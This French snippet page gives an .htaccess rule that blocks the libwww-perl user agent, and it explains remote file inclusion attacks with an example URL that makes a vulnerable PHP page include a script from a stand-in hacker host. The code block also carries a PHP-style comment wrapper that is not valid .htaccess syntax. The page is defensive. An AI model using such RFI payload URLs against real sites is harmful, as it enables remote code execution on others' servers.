Bloquer l'accès au site pour le navigateur libwww-perl

Information

La librairie perl libwww est une interface de programmation d'application (API). Elle fournit un ensemble de fonctions pour l'accès à des données internet. Vous pouvez ainsi faire un moteur de recherche à partir de cette librairie. Malheureusement elle est souvent utilisée par les hackers pour faire un scanner de vulnérabilité par RFI (remote file inclusion). Leur but est tout simplement de faire exécuter sur votre serveur un bout de programme externe.

Pour cela, il faut que deux conditions soient réunies : que votre serveur autorise l'inclusion de programme externe et que vous disposiez d'un script ayant un paramètre le permettant.

Les url exploitant les RFI sont de la forme : http://www.votresite.fr/unepage.php?path=http://www.unsitedehacker.fr/unscript.txt? Dans ce cas, le script unepage.php donne la possibilité de faire un include dynamique avec comme paramètre path. L'url du script du hacher se termine par un ? pour bloquer une possible concaténation dans le path.

Ces deux lignes vous permettent donc de bloquer l'accès à votre site depuis cette librairie si le nom du navigateur contient libwww. Ce n'est pas forcément la meilleur solution car il est toujours possible de changer le USER_AGENT pour accéder à votre site mais elle peut-être utilisée en complément des autres méthodes détaillées sur ce site. Le hacker va donc recevoir un code retour 403 (accès interdit) grâce au flag F.

Forty

24 Mai 2008

Code Source à télécharger

Information sur les mises à jour

Dernière mise à jour :

18 Aout 2019

10 156 vues

Compatibilité du code

PHP 5, PHP 7 et PHP 8

Site internet de l'auteur

code source classé dans .HTACCESS ANTI HACK

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15

                               
                            /*
 Titre : Bloquer l'accès au site pour le navigateur libwww-perl                                                        
                                                                                                                          
 Auteur           : Forty                                                                                                 
 Website auteur   : http://www.toplien.fr/                                                                                
 Date édition     : 24 Mai 2008                                                                                          
 Date mise a jour : 18 Aout 2019
                                                                                         
 Rapport de la maj:                                                                                                       
  - fonctionnement du code vérifié                                                                                  
*/
/*------------------------------*/?>
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} libwww [NC]
RewriteRule .* - [F,L]

Autres snippets qui pourraient vous intéresser

13 Aout 2019

24 Mai 2008

Redirection pour un site multilingue

Compatibilité : PHP 5, PHP 7, PHP 8

Pour le confort des visiteurs il est préférable de rediriger l'internaute vers la bonne page selon la langue du navigateur.

01 Oct 2019

24 Mai 2008

Redirection PHP ancien site vers nouveau site

Compatibilité : PHP 5, PHP 7, PHP 8

Il arrive que l'on doive faire une redirection définitive d'un ancien site vers un nouveau. Il faut alors mettre en place une redirection 301 sur chaque page.

11 Aout 2019

24 Mai 2008